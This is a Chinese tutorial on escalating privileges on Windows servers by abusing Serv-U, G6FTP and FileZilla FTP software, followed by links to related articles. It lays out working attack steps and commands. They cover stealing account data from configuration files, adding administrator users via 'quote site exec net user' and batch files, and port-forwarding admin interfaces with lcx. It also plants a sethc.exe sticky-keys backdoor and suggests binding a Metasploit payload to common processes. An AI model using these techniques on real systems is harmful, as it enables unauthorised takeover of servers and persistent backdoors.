第三方软件提权之FTP软件
server_U 提权
对于不可写权限,serv_u 6.4以下的,如果默认密码没有修改的,直接可以提权。serv_u 7以上的可以修改下脚本提权目录,不要用默认的C盘,改在其他盘符用脚本提权。serv-u的默认端口是43958,密码文件的安装目录 c:\Program Files\Serv-u\SerUDaemon.ini
一、读取配置文件
1.server-u默认安装目录下的ServUDaemon.ini文件记录着所有的ftp账号信息(32位默认安装路径C:\Program Files (x86)\RhinoSoft.com\Serv-U\ServUDaemon.ini),拿到密码可以直接拿去md5解密
2.如果有权限修改ServUDaemon.ini文件,可直接增加高权限ftp用户。添加账号的password值是加盐md5加密后的值(例如:盐是cq,就md5加密cq123456,然后Password=cq+md5(cq123456)
3.如果得到的ftp账号权限是管理权限,可直接ftp登录执行命令创建用户
quote site exec net user test test123 /add
quote site exec net localgroup administrators test /add
如图用户创建成功,而且是管理员权限
方法二、大马通过server-u的管理员账号创建新的ftp账号,然后用大马创建的账号登录进行提取## 方法三、直接提权
server-u的管理员账号权限较大,相当于系统权限,可以通过管理员账号直接创建用户,并且加入到管理员组。
如果server-U 用户默认密码被修改了,下载ServUAdmin.exe文件用c32打开就可以找到账号及密码,注意使用迅雷可能会出现问题,建议直接用浏览器下载
G6 ftp提权ftp
G6ftp安装目录下remoteadmin/remote.ini文件包含有账号信息,可通过解密得到账号密码,有修改权限也可以直接修改或添加用户
g6ftp默认监听在127.0.0.1的8021端口上,所以需要使用lcx 工具将该端口转发出去。如果无法执行cmd命令,需要在可读可写目录上传cmd和lcx等程序,然后才能进行端口转发
1.端口转发
lcx.exe -tran 8222 127.0.0.1 8021
#转发127.0.0.1 8021端口到全IP 8222端口
在服务器里面查看。确定已经转发成功
2.远程登录
端口转发完成后,直接使用g6ftp客户端以管理员用户远程登录软件。这里分别填入转发后的端口已经在最开始得到的用户名及密码
连接成功
3.创建ftp用户
设置用户家目录
给该账号所有权限
4.新建批处理命令,分别填入命令名称以及要执行的批处理文件路径
5.通过新建的ftp用户上传文件1.bat
#批处理文件内容
net user ftptest 123.com /add
net localgroup administrators ftptest /add
6.执行批处理命令,客户端会加载支持此批处理
quote site useradd
7.提权成功,新建了ftptest账户,且为管理员权限
filezilla提权
filezilla是一款开源的FTP服务器和客户端的软件。若安装了服务器端默认只侦听127.0.0.1的14147端口。并且默认安装目录目录下有两个敏感文件 filezilla server.xml(包含了用户信息)和filezilla server interface.xml(包含了管理信息)
C:\Program Files\FileZilla Server\FileZilla Server Interface.xml
提权思路:
1.下载这个两个文件,拿到管理密码
2.配置端口转发,登录远程管理ftp server
提权步骤:
1.端口转发
C:\Inetpub\wwwroot\8099\lcx.exe -tran 14148 127.0.0.1 14147
2.远程连接
转发完成后使用filezilla 服务端软件远程连接,登录成功
3.创建ftp用户
4.设置密码
5.设置家目录及控制权限
6. 使用filezilla客户端远程连接成功
7.使用cmd.exe改名为sethc.exe替换c:\windows\system32\sethc.exe生成shift后门
8.连接3389按5次shift 调出cmd.exe
taskmgr
# 调用任务管理器
explorer.exe
# 调用桌面
net user test 123.com /add
net localgroup administrators test /add
#创建用户
注意:高版本服务器进不了登录界面,无法利用五次shift弹出cmd.exe。可以利用msf生成payload捆绑到目标cmd.exe/explorer.exe(经常使用的进程)上等待目标上线。然后进行提权
第三方软件提权之FTP软件相关推荐
- 提权学习:第三方软件提权(Server-u 提权)43958
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 第三方软件提权 Server-u 提权 Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2 ...
- 提权学习:第三方软件提权(PcAnywhere 提权)5631
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 第三方软件提权 PcAnywhere 提权 0x01 介绍 0x02 原理 0x03 前言 0x04 思路: 0x05 操作步骤演示: 0 ...
- 提权学习:第三方软件提权(FileZilla 提权)14147
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 FileZilla 提权 0x01 介绍 0x02 提权思路 0x03 操作演示 0x04 拓展知识 提权的思路就以下几种: 这篇文章直接 ...
- 提权学习:第三方软件提权(G6FTP 提权) 8021
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 G6FTP 提权 0x01 介绍 0x02 G6FTP 提权思维导图 0x03 操作步骤演示 文章传送门: ...
- 提权学习:第三方软件提权(搜狗输入法提权)
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 搜狗输入法提权 0x01 介绍 0x02 搜狗输入法提权演示 0x03 漏洞证明: 0x04 修复方案: 搜狗输入法提权 0x01 介绍 ...
- 提权学习:第三方软件提权(Radmin 提权) 4899
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Radmin 提权 0x01 介绍 0x02 利用方式 常见虚拟主机常见路径 第一种方式:手工查询注册表爆hash值 第二种方式:通过大马 ...
- 提权学习:第三方软件提权(巴西烤肉提权和启动项提权)
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 巴西烤肉提权 启动项提权 0x01 启动项提权 0x02 启动项提权,拓展知识 [写入启动项提权/启动项里提权] 巴西烤肉提权 首先,基本 ...
- 提权学习:第三方软件提权(破解hash 提权、MFS 破解hash 提权、GetPass 破解hash提权、QuarksPwDump 破解hash提权)
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 破解hash 值提权 0x01 Pwdunp7 破解hash 0x02 GetPass 破解hash 0x03 hash传递入侵 MSF加 ...
- 【内网安全】——Windows提权姿势
作者名:白昼安全 主页面链接: 主页传送门 创作初心: 一切为了她 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: web安全,后渗透技术 每日emo: 不悲伤,不彷徨,有风听风,有雨看雨 一.W ...
最新文章
- 在“内卷”、“红海”的2020 年,开垦计算机视觉领域的知识荒原:BatchNorm
- 一起学微软Power BI系列-使用技巧(3)Power BI安卓手机版安装与体验
- canvas绘制闹钟-方法1
- c语言中一百以内相乘的积,一百以内的加减乘除法游戏....
- volatile 和 sig_atomic_t
- 认证令牌_Java应用程序的令牌认证
- webpack来打包你的vue项目,如发现你的vendor.js过大
- 数据结构与算法——搜索
- Laravel Carbon获取 某个时间后N个月的时间
- Error: Can’t resolve ‘./src’ in ‘E:\ASUS\Documents\VSCode files\WebPackProject’
- 关于session应用(2)--JAVA中怎么使用session
- 数据密集型系统设计pdf下载
- python之花瓣美女下载
- groovy教程入门
- amd vega56 ubuntu 下 tensorflow GPU rocm 运行情况记录及跑分
- python解决鸡兔同笼_python解决鸡兔同笼问题
- 智能名片小程序开发文档概要
- mysql 上周时间_mysql 获取上周1到周日的时间
- Rancher+k3s+阿里云流水线详细配置教程
- iOS 小数向上、下取整